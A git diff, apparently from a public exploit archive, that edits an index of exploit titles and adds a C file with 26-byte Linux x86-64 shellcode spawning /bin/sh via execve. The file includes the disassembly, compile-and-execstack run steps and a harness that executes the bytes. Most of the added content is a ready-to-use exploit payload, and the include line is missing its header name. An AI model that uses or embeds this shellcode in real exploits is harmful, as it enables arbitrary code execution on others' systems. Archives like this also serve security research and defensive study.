diff --git a/files.csv b/files.csv index 2a5376c93..7b0cef0c5 100755 --- a/files.csv +++ b/files.csv @@ -16263,7 +16263,7 @@ id,file,description,date,author,platform,type,port 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0 +18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 @@ -35846,3 +35846,4 @@ id,file,description,date,author,platform,type,port 39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 +39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 diff --git a/platforms/lin_x86-64/shellcode/39617.c b/platforms/lin_x86-64/shellcode/39617.c new file mode 100755 index 000000000..ef439d52d --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39617.c @@ -0,0 +1,48 @@ +/* +--------------------------------------------------------------------------------------------------- + +Linux/x86_x64 - execve(/bin/sh) - 26 bytes + +Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] + +Om Asato Maa Sad-Gamaya | +Tamaso Maa Jyotir-Gamaya | +Mrtyor-Maa Amrtam Gamaya | +Om Shaantih Shaantih Shaantih | + +--------------------------------------------------------------------------------------------------- +Disassembly of section .text: + +0000000000400080 <.text>: + 400080: eb 0b jmp 0x40008d + 400082: 5f pop %rdi + 400083: 48 31 d2 xor %rdx,%rdx + 400086: 48 89 d6 mov %rdx,%rsi + 400089: b0 3b mov $0x3b,%al + 40008b: 0f 05 syscall + 40008d: e8 f0 ff ff ff callq 0x400082 + 400092: 2f (bad) + 400093: 2f (bad) + 400094: 62 (bad) + 400095: 69 .byte 0x69 + 400096: 6e outsb %ds:(%rsi),(%dx) + 400097: 2f (bad) + 400098: 73 68 jae 0x400102 +--------------------------------------------------------------------------------------------------- + +How To Run + +$ gcc -o sh_shell sh_shell.c +$ execstack -s sh_shell +$ ./sh_shell + +--------------------------------------------------------------------------------------------------- +*/ +#include +char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"; +void main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) sh; + (int)(*func)(); +}